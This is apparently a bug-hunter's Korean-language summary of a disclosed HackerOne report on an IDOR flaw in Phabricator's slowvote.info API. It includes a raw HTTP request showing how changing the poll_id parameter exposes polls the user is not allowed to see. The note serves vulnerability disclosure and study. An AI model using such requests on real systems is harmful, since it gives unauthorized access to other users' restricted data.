hackerone-phabricator-2019-08-n-661978

IDOR bug to See hidden slowvote of any user even when you dont have access right

보고서

투표 기능이 있는데, 투표를 만드는 사람이 투표에 접근할 수 있는 유저를 제한할 수 있다. 하지만 투표를 볼 권한이 없더라도 IDOR를 통해 접근할 수 있었다.

POST /api/slowvote.info HTTP/1.1
Host: phabricator.localhost.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Connection: close
Cookie: phsid=smpm4rp6yltbzna3qda2nwbomsoidzwjfshkkw7v; phusr=admin
Upgrade-Insecure-Requests: 1

__csrf__=B%40wmnrkyq3468c99179280354c&__form__=1&params%5Bpoll_id%5D=1&output=human

poll_id 파라미터에 타겟의 poll_id를 넣으면 숨겨진 투표를 볼 수 있었다.

---

tags: bughunting, wstg-athz-04, idor, web hacking, severity none